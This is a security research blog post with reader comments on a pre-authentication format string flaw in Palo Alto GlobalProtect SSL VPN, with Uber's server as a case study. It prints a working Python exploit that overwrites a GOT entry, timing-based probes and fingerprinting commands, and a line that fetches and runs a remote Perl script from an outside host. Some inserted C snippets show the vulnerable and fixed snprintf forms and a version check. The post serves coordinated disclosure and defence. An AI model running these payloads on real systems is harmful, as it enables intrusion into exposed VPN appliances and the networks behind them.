Wednesday, July 17, 2019

Attacking SSL VPN - Part 1: PreAuth RCE on Palo Alto GlobalProtect, with Uber as Case Study!




Author: Orange Tsai(@orange_8361) and Meh Chang(@mehqq_)
P.S. This is a cross-post from the DEVCORE blog




SSL VPNs protect corporate assets from Internet exposure, but what if the SSL VPNs themselves are vulnerable? They are exposed to the Internet and trusted to reliably guard the only way into your intranet. Once the SSL VPN server is compromised, attackers can infiltrate your intranet and even take over all users connecting to the SSL VPN server! Because of this importance, over the past several months we started new research on the security of leading SSL VPN products.

We plan to publish our results in 3 articles. We put this one first because we think it is an interesting story and very suitable as an appetizer for our Black Hat USA and DEFCON talk:
  • Infiltrating Corporate Intranet Like NSA - Pre-auth RCE on Leading SSL VPNs!

Don’t worry about the spoilers, this story is not included in our BHUSA/DEFCON talks.

In our upcoming presentations, we will present more hard-core exploitation and crazy bug chains to hack into your SSL VPN, from how we jailbreak the appliance to which attack vectors we focus on. We will also demonstrate gaining a root shell from the only exposed HTTPS port, covertly weaponizing the server against its owner, and abusing a hidden feature to take over all VPN clients! So please look forward to it ;)

The story


In this article, we would like to talk about the vulnerability in Palo Alto's SSL VPN. Palo Alto calls its SSL VPN product line GlobalProtect. You can easily identify a GlobalProtect service by the 302 redirect from the web root to /global-protect/login.esp!

We discovered the vulnerability by accident during one of our Red Team assessment engagements. At first, we thought it was a 0day. However, we failed to reproduce it on a remote server running the latest version of GlobalProtect, so we began to suspect that it was a known vulnerability.

We searched all over the Internet but could not find anything: no previous public RCE exploit[1], no official advisory describing anything similar, and no CVE. So we believe this must be a silently fixed 1-day!


[1] There are earlier exploits for the PAN-OS management interface, such as CVE-2017-15944 and the excellent TROOPERS16 paper by @_fel1x, but unfortunately they do not cover GlobalProtect, and the management interface is only exposed on the LAN port.

The bug


The bug is very straightforward. It is just a simple format string vulnerability, with no authentication required! sslmgr is the SSL gateway that handles the SSL handshake between the server and clients. The daemon is exposed through the Nginx reverse proxy and can be reached at the path /sslmgr.

$ curl https://global-protect/sslmgr
<?xml version="1.0" encoding="UTF-8" ?>
        <clientcert-response>
                <status>error</status>
                <msg>Invalid parameters</msg>
        </clientcert-response>


During parameter extraction, the daemon searches for the string scep-profile-name and passes its value as the snprintf format string used to fill a buffer. That leads to a format string attack. You can crash the service just with %n!

POST /sslmgr HTTP/1.1
Host: global-protect
Content-Length: 36

scep-profile-name=%n%n%n%n%n...
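The two shapes of this sink, as an added illustration that is not sslmgr's code (the daemon's source is not public; the function names, the form-body parser and the 128-byte profile buffer are assumptions): the vulnerable form passes the extracted value as the snprintf format, so every % in it is interpreted, while the hardened form uses a constant format and passes the value as its argument, so a % in the value is just a byte to copy.

```c
#include <stdio.h>
#include <string.h>

/* Added illustration, not sslmgr's code: a minimal form-body parameter
 * extractor. Copies the value of `key` into `out` and returns its length,
 * or -1 when the key is absent. */
static int get_param(const char *body, const char *key, char *out, size_t outsz)
{
    size_t klen = strlen(key);
    const char *p = body;
    while (p != NULL) {
        if (strncmp(p, key, klen) == 0 && p[klen] == '=') {
            const char *v = p + klen + 1;
            const char *end = strchr(v, '&');
            size_t vlen = end ? (size_t)(end - v) : strlen(v);
            if (vlen >= outsz)
                vlen = outsz - 1;           /* truncate rather than overflow */
            memcpy(out, v, vlen);
            out[vlen] = '\0';
            return (int)vlen;
        }
        p = strchr(p, '&');
        if (p != NULL)
            p++;
    }
    return -1;
}

/* The vulnerable shape described in the text: the attacker-controlled value
 * is passed AS the format string, so snprintf interprets every '%' in it.
 * gcc and clang flag this line under -Wformat-security; the pragmas only
 * silence that warning so the block compiles as a demonstration. */
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wformat-security"
#pragma GCC diagnostic ignored "-Wformat-nonliteral"
int build_msg_unsafe(const char *body, char *buf, size_t bufsz)
{
    char profile[128];
    if (get_param(body, "scep-profile-name", profile, sizeof profile) < 0)
        return -1;
    return snprintf(buf, bufsz, profile);   /* BUG: non-literal format */
}
#pragma GCC diagnostic pop

/* The hardened shape: a constant format string, the value passed as an
 * argument. A '%' in the value is now just a byte to copy. */
int build_msg_safe(const char *body, char *buf, size_t bufsz)
{
    char profile[128];
    if (get_param(body, "scep-profile-name", profile, sizeof profile) < 0)
        return -1;
    return snprintf(buf, bufsz, "%s", profile);
}

int main(void)
{
    char out[256];
    /* constructed request body carrying the crash payload from the text */
    const char *body = "scep-profile-name=%n%n%n%n&host-id=x";
    build_msg_safe(body, out, sizeof out);
    printf("safe:   [%s]\n", out);          /* the literal text %n%n%n%n */
    /* the unsafe form is only ever called here with a benign value */
    build_msg_unsafe("scep-profile-name=corp-ca", out, sizeof out);
    printf("unsafe: [%s]\n", out);
    return 0;
}
```

The compiler warning the pragmas suppress is the cheapest detection for this bug class: building with -Wformat-security (or -Werror=format-security in release builds) turns the vulnerable line into a build failure.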

Affected versions


According to our survey, all GlobalProtect releases before July 2018 are vulnerable! Here is the affected version list:
  • Palo Alto GlobalProtect SSL VPN 7.1.x < 7.1.19
  • Palo Alto GlobalProtect SSL VPN 8.0.x < 8.0.12
  • Palo Alto GlobalProtect SSL VPN 8.1.x < 8.1.3

The 9.x and 7.0.x series are not affected by this vulnerability.
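An added triage helper for checking an inventory against this list (not from the article or from Palo Alto; the function name and the placeholder hostnames are mine). The comparison is numeric per component, because a plain string comparison would order 8.0.9 after 8.0.12 and mis-triage it as fixed.

```c
#include <stdio.h>

/* Added triage helper, not from the article or Palo Alto. Compares a
 * GlobalProtect/PAN-OS version string against the affected ranges listed
 * above (fixed in 7.1.19, 8.0.12 and 8.1.3; 7.0.x and 9.x not affected).
 * Returns 1 = affected, 0 = fixed or not an affected branch, -1 = unparsable. */
int globalprotect_version_affected(const char *version)
{
    /* first fixed patch level of each affected branch, per the list above */
    static const struct { int major, minor, fixed_patch; } branches[] = {
        { 7, 1, 19 },
        { 8, 0, 12 },
        { 8, 1,  3 },
    };
    int major, minor, patch;
    /* "8.0.6" and a hotfix-style "8.0.6-h1" both parse; "8.0" does not */
    if (sscanf(version, "%d.%d.%d", &major, &minor, &patch) != 3
        || major < 0 || minor < 0 || patch < 0)
        return -1;
    for (size_t i = 0; i < sizeof branches / sizeof branches[0]; i++) {
        if (branches[i].major == major && branches[i].minor == minor)
            return patch < branches[i].fixed_patch;   /* numeric, not lexical */
    }
    return 0;   /* 7.0.x, 9.x and any other branch: not listed as affected */
}

int main(void)
{
    /* constructed inventory; the hostnames are placeholders */
    const char *inventory[][2] = {
        { "vpn-a.example", "8.0.6"  },
        { "vpn-b.example", "8.0.12" },
        { "vpn-c.example", "7.1.9"  },
        { "vpn-d.example", "9.0.1"  },
    };
    for (size_t i = 0; i < sizeof inventory / sizeof inventory[0]; i++) {
        int r = globalprotect_version_affected(inventory[i][1]);
        printf("%-14s %-7s %s\n", inventory[i][0], inventory[i][1],
               r == 1 ? "AFFECTED" : r == 0 ? "ok" : "unparsable");
    }
    return 0;
}
```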

How to verify the bug


Although we know where the bug is, verifying the vulnerability is still not easy. The result of this format string is never output, so we cannot obtain any address leak to confirm the bug. And crashing the service is never our first choice[1]. To avoid crashes, we need a way to verify the vulnerability elegantly!

After reading the snprintf manual, we chose %c as our gadget! When a width is given before the conversion, such as %9999999c, snprintf pads the output to that many characters internally. We observe the response time for large widths to verify this vulnerability!

$ time curl -s -d 'scep-profile-name=%9999999c' https://global-protect/sslmgr >/dev/null
real    0m1.721s
user    0m0.037s
sys     0m0.005s
$ time curl -s -d 'scep-profile-name=%99999999c' https://global-protect/sslmgr >/dev/null
real    0m2.051s
user    0m0.035s
sys     0m0.012s
$ time curl -s -d 'scep-profile-name=%999999999c' https://global-protect/sslmgr >/dev/null
real    0m5.324s
user    0m0.021s
sys     0m0.018s

As you can see, the response time increases with the width given to %c. So, from the time difference, we can identify a vulnerable SSL VPN elegantly!


[1] Although there is a watchdog monitoring the sslmgr daemon, it’s still improper to crash a service!

The exploitation


Once we can verify the bug, exploitation is easy. To exploit the binary successfully, we first need to determine the exact version. We can distinguish versions by the Last-Modified header of static files, such as /global-protect/portal/css/login.css on 8.x and /images/logo_pan_158.gif on 7.x!

$ curl -s -I https://sslvpn/global-protect/portal/css/login.css | grep Last-Modified
Last-Modified: Sun, 10 Sep 2017 16:48:23 GMT


With the version identified, we can now write our own exploit. We simply overwrote the strlen pointer in the Global Offset Table (GOT) with the Procedure Linkage Table (PLT) entry of system. Here is the PoC:

#!/usr/bin/python

import requests
from pwn import *

url = "https://sslvpn/sslmgr"
cmd = "echo pwned > /var/appweb/sslvpndocs/hacked.txt"

strlen_GOT = 0x667788 # change me
system_plt = 0x445566 # change me

fmt =  '%70$n'
fmt += '%' + str((system_plt>>16)&0xff) + 'c'
fmt += '%32$hn'
fmt += '%' + str((system_plt&0xffff)-((system_plt>>16)&0xff)) + 'c'
fmt += '%24$hn'
for i in range(40,60):
    fmt += '%'+str(i)+'$p'

data = "scep-profile-name="
data += p32(strlen_GOT)[:-1]
data += "&appauthcookie="
data += p32(strlen_GOT+2)[:-1]
data += "&host-id="
data += p32(strlen_GOT+4)[:-1]
data += "&user-email="
data += fmt
data += "&appauthcookie="
data += cmd
r = requests.post(url, data=data)


Once the overwrite is done, sslmgr becomes our webshell, and we can execute commands via:

$ curl -d 'scep-profile-name=curl orange.tw/bc.pl | perl -' https://global-protect/sslmgr


We reported this bug to Palo Alto via their report form. However, we got the following reply:

Hello Orange,

Thanks for the submission. Palo Alto Networks does follow coordinated vulnerability disclosure for security vulnerabilities that are reported to us by external researchers. We do not CVE items found internally and fixed. This issue was previously fixed, but if you find something in a current version, please let us know.

Kind regards

Hmmm, so it seems this vulnerability is known to Palo Alto, but not ready for the world!

The case study


After we became aware that this is not a 0day, we surveyed all Palo Alto SSL VPNs around the world to see whether any large corporations were using the vulnerable GlobalProtect, and Uber is one of them! From our survey, Uber owns about 22 servers running GlobalProtect around the world; here we take vpn.awscorp.uberinternal.com as an example!

From the domain name, we guess Uber uses the BYOL offering from the AWS Marketplace. From the login page, it seems Uber uses an 8.x version, and we can narrow the possible target versions down from the supported version list on the Marketplace overview page:
  • 8.0.3
  • 8.0.6
  • 8.0.8
  • 8.0.9
  • 8.1.0

Finally, we figured out the version: it is 8.0.6, and we got the shell back!



Uber responded very quickly and took the right steps to fix the vulnerability, and Uber gave us a detailed explanation of the bounty decision:

Hey @orange — we wanted to provide a little more context on the decision for this bounty. During our internal investigation, we found that the Palo Alto SSL VPN is not the same as the primary VPN which is used by the majority of our employees.

Additionally, we hosted the Palo Alto SSL VPN in AWS as opposed to our core infrastructure; as such, this would not have been able to access any of our internal infrastructure or core services. For these reasons, we determined that while it was an unauthenticated RCE, the overall impact and positional advantage of this was low. Thanks again for an awesome report!

It’s a fair decision. It is always a great time communicating with Uber and reporting to their bug bounty program. We don’t care about the bounty that much, because we enjoy the whole research process and giving back to the security community! Nothing can be better than this!


87 comments:

  1. This comment has been removed by the author.
  2. You got gypped on the bounty... Not saying I can talk about the implementation, but think about why anyone would spin up a VPN without access to their core infra...
  3. Hi, this may be product specific. How does one find such format string vulns at URL endpoints in other SSL VPN products that use nginx? Please let me know.
  4. Bro, awesome. Looking forward to the Black Hat talk.
  5. This comment has been removed by the author.
  6. Hello, Orange team,
    can you take on website security testing work?
    We have several websites here that need security testing.
    The pay can be calculated monthly, about 80,000-150,000 US dollars, or per job;
    the pay can be higher, details can be discussed.
    My Telegram is @yyue819,
    or on Skype, also yyue819.
    If you are interested, please contact me, thank you.
    Do you have a contact method? I can also add you.

    Sincerely looking forward to cooperation and mutual development.

    hello orange team
    May I ask if you can conduct website security inspection
    We have several websites here that need to be tested for security
    The pay can be anywhere from $80000 to $150000 per month, or depending on the unit
    The compensation can be more, and it can be discussed in detail,
    my telegram is @yyue819 and skype is yyue819
    If you are interested, please contact me. Thank you

    Sincerely look forward to cooperation and common development with you, and make money
  7. How do you execute that Python code? Can you please go one more step ahead for this line: "With a specified version, we can write our own exploit now. We simply modified the pointer of strlen on the Global Offset Table(GOT) to the Procedure Linkage Table(PLT) of system. Here is the PoC:"